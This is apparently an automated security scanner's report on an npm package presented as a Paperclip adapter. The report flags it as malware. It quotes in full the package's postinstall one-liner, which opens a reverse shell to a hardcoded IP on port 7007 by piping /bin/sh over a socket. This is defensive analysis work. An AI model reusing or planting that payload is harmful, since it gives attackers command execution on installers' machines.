AI Security Review
scanned 3h ago · by lpm-firewall-aiThe package has an unconditional npm postinstall reverse shell. Installing the package connects to a hardcoded IP and exposes /bin/sh over that socket.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install / package installation lifecycle postinstall
Impact
Remote attacker can execute shell commands as the installing user on the host during installation.
Mechanism
install-time reverse shell via node net.connect and child_process.spawn('/bin/sh')
Attack narrative
On installation, npm runs package.json postinstall. That hook starts a Node one-liner, connects to 185.112.147.174:7007, spawns /bin/sh, and pipes the shell's standard streams to the socket. This grants interactive remote command execution before any legitimate Paperclip adapter use.
Rationale
Source inspection confirms a deterministic install-time reverse shell in package.json, independent of the documented adapter functionality. This is concrete malicious behavior with remote command execution on install.
Evidence
package.jsondist/index.jsdist/server/execute.jsdist/server/index.jsdist/server/config-schema.jsdist/server/test.jsdist/metadata.jsREADME.md
Network endpoints1
185.112.147.174:7007
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- package.json defines postinstall lifecycle hook executed on npm install.
- postinstall opens TCP connection to 185.112.147.174:7007 using net.connect.
- postinstall spawns /bin/sh and pipes stdin/stdout/stderr to the remote socket, creating a reverse shell.
- The reverse shell is unrelated to the documented Paperclip adapter behavior in README.md and dist/*.js.
- Runtime adapter command execution in dist/server/execute.js is user-configured, but the install hook is unconditional.
Evidence against
- dist/index.js only exports metadata and createServerAdapter.
- dist/server/execute.js runs configured commands through adapter-utils and supports documented SSH mode.
- README.md documents a maintenance adapter that runs configured shell commands; it does not disclose install-time remote shell behavior.
- rg found the hardcoded remote endpoint only in package.json postinstall.
Behavioral surface
EnvironmentVars
HighEntropyStrings
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node -e "const c=require('net').connect(7007,'185.112.147.174');const p=require('child_process').spawn('/bin/sh',[]);c.pipe(p.stdin);p.stdout.pipe(c);p.stderr.pipe(c);"
Critical
Red Install Lifecycle Script
Install-time lifecycle script matches a deterministic static-gate block pattern.
package.jsonView on unpkg•scripts.postinstall = node -e "const c=require('net').connect(7007,'185.112.147.174');const p=require('child_process').spawn('/bin/sh',[]);c.pipe(p.stdin);p.stdout.pipe(c);p.stderr.pipe(c);"
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkgFindings
1 Critical1 High2 Medium3 Low
CriticalRed Install Lifecycle Scriptpackage.json
HighInstall Time Lifecycle Scriptspackage.json
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowNon Install Lifecycle Scripts
LowScripts Present
LowHigh Entropy Strings